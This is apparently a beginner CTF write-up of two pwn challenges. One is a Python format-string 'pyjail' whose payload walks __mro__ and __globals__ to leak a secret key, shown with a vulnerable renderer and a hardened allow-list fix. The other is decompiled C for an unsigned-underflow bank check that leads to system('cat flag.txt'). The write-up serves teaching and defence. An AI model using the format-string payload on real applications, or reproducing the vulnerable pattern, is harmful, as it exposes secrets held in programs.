pwn
Well, because of things at school I haven't played a CTF in a long time, so I picked a beginner-difficulty CTF to warm up.
Knight’s Secret
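pyjail?? The challenge defines a custom Person class, and its attributes and methods can be accessed. The goal is just to obtain the key that lives in the program's environment: use the inheritance-chain array returned by the built-in `__mro__` to get the object, and once you have it, the built-in `__globals__` lets you look through the attributes and methods present in the program and pull out the key.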
exp
```
Enter your secret: {person_obj.__class__.__mro__[0].__init__.__globals__}
Output: {'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x76a7e6a7b920>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': '/challenge/challenge.py', '__cached__': None, 'CONFIG': {'KEY': '_KNIGHTSECRET2025_'}, 'Person': <class '__main__.Person'>, 'fun': <function fun at 0x76a7e6a62340>, 'main': <function main at 0x76a7e6840d60>}
```
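Why the input above leaks the globals, and one way to close the hole, as an added example that is not the challenge's source: `Person`, `CONFIG`, `render_vulnerable`, `FlatFormatter` and `render_hardened` are a hypothetical reconstruction based on the globals dump, and the key is a constructed value.

```python
import string

# Constructed stand-in for the secret held in the challenge's module globals.
CONFIG = {"KEY": "_CONSTRUCTED_KEY_"}


class Person:
    def __init__(self, name):
        self.name = name


def render_vulnerable(template, person):
    # Assumed bug: user input is used as the format string itself, so
    # str.format resolves every ".attr" and "[index]" in a field name.
    # __mro__[0] is Person itself; its Python-defined __init__ is a plain
    # function, and every function exposes its module via __globals__.
    return template.format(person_obj=person)


class FlatFormatter(string.Formatter):
    """Accept only bare, allow-listed field names (no '.' or '[' traversal)."""

    ALLOWED = {"name"}

    def get_field(self, field_name, args, kwargs):
        if field_name not in self.ALLOWED:
            raise ValueError(f"field not allowed: {field_name!r}")
        return kwargs[field_name], field_name


def render_hardened(template, person):
    # Only plain values are handed to the formatter, never the object, so
    # there is nothing to traverse even if the allow-list were widened.
    return FlatFormatter().format(template, name=person.name)


if __name__ == "__main__":
    payload = "{person_obj.__class__.__mro__[0].__init__.__globals__}"
    p = Person("alice")
    print("vulnerable leaks key:", CONFIG["KEY"] in render_vulnerable(payload, p))
    try:
        render_hardened(payload, p)
    except ValueError as exc:
        print("hardened rejects:", exc)
    print(render_hardened("hello {name}", p))
```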
Knight Bank
Integer overflow: just make the uint overflow.
```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned int v4; // withdrawal amount read from the user
  unsigned int v5; // balance

  v5 = 1000;
  puts("Welcome to the Knight Bank!");
  fflush(_bss_start);
  printf("Your current balance is: %u\n", 1000LL);
  fflush(_bss_start);
  printf("Enter the amount you want to withdraw: ");
  fflush(_bss_start);
  if ( (unsigned int)__isoc99_scanf("%u", &v4) == 1 )
  {
    if ( v4 <= 0xF4240 ) // 0xF4240 == 1,000,000
    {
      v5 -= v4; // unsigned subtraction, never compared against the balance
      printf("You withdrew %u. Your new balance is %u.\n", v4, v5);
      fflush(_bss_start);
      if ( v5 <= 0xF4240 )
      {
        puts("Better luck next time!");
        fflush(_bss_start);
      }
      else
      {
        win_prize();
      }
      return 0;
    }
    else
    {
      puts("Error: You cannot withdraw more than 1,000,000 at a time.");
      fflush(_bss_start);
      return 1;
    }
  }
  else
  {
    puts("Invalid input. Exiting.");
    fflush(_bss_start);
    return 1;
  }
}

int win_prize()
{
  puts("Congratulations! You win the prize!");
  fflush(_bss_start);
  return system("cat flag.txt");
}
```
exp